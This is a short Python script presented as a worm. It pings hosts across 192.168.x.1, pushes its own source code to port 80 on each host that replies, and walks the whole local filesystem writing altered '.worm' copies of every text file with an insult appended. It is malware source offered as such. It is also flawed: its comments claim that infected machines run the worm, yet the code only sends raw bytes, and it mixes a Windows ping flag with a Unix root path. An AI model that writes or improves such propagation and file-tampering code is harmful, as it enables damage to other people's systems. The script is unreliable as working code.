import socket
import os

def connect_to_target(ip):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, 80))

    # Send the worm code to the target
    with open(__file__, 'rb') as f:
        content = f.read()
    sock.sendall(content)

    # Close the connection
    sock.close()

def main():
    for ip in range(1, 256):
        if os.system(f'ping -n 1 192.168.{ip}.1') == 0:
            print(f"Found target at 192.168.{ip}.1")
            connect_to_target(f'192.168.{ip}.1')

    # Run the worm on each infected computer
    for root, dirs, files in os.walk('/'):
        for file in files:
            if file.endswith('.txt'):
                with open(os.path.join(root, file), 'r') as f:
                    content = f.read()
                with open(os.path.join(root, f'{file}.worm'), 'w') as f:
                    f.write(content + "You suck!")

if __name__ == '__main__':
    main()
